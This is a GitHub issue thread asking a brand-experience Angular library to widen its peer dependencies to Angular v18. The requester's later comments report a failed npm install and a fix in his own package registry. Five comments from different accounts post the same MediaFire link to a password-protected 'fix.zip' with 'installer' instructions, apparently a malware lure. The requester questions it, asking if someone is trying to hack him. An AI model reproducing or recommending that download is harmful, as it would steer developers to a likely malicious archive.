### ISSUE TITLE
Support for1 Angular v18

### ISSUE THREAD

**Issue by TomBrch** [innomotics/brand-experience#34]
### Prerequisites

- [X] I have not leaked any internal company information.
- [X] I have not posted internal links or code snippets.

### Suggestion / feature request

Hello.
Can you, please, add support for Angular v18?

I believe it would be enough to add ` || ^18.0.0` into `package.json` file. (https://github.com/innomotics/brand-experience/blob/main/packages/angular-lib/package.json)

Like this:
```code
  "peerDependencies": {
    "@angular/common": "^17.3.5 || ^18.0.0",
    "@angular/core": "^17.3.5 || ^18.0.0",
    "@angular/forms": "^17.3.5 || ^18.0.0",
    ...
  }
```
I believe it should not create any issues and we can easily install this package without `--force` argument.
I do not know how to test it. We just have all projects in Angular v18.
Tomas

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TomBrch** [comment]
Somebody wants to hack me or what is that?

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TomBrch** [comment]
Hi. Thanks for quick response.

I tried to install by command ` npm install @innomotics/brand-experience-angular-lib@0.0.2-beta-2`
and this error occurs:
```bash
npm error code ETARGET
npm error notarget No matching version found for @innomotics/brand-experience-angular-lib@0.0.2-beta-2.
npm error notarget In most cases you or one of your dependencies are requesting
npm error notarget a package version that doesn't exist.
```
It looks like the change was not published.

**Comment by TomBrch** [comment]
Thank you. I found the problem.

I set our own package server (Verdaciio) and used the same @innomotics prefix for our packages. I had to change that and now it works. Thanks.

**Comment by TomBrch** [comment]
I forgot to close the issue.
